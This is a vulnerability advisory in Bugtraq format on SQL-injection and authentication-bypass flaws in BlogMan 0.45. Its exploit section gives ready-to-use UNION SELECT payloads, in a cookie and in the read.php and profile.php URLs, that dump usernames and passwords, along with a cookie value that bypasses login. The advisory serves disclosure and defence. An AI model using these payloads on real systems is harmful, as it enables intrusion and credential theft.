BlogMan Multiple Input Validation Vulnerabilities
-\\Bugtraq ID:
33950
-\\Class:
Input Validation Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 02 2009 12:00AM
-\\Updated:
Mar 04 2009 05:16PM
-\\Credit:
Salvatore 'drosophila' Fresta
-\\Vulnerable:
Fahim A. Farook BlogMan 0.45
-\\Discussion
BlogMan is prone to multiple input-validation vulnerabilities:
- Multiple SQL-injection vulnerabilities
- An authentication-bypass vulnerability
A successful exploit may allow an attacker to compromise the application, gain unauthorized access to the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BlogMan 0.45 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
Attackers can use a browser to exploit these issues.
The following example URIs and cookie data are available:
Name: blogmanuserid
Content: -1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
http://www.example.com/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
http://www.example.com/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--BlogMan Homepage
http://farook.org/BlogMan.ht (Fahim A. Farook)
|
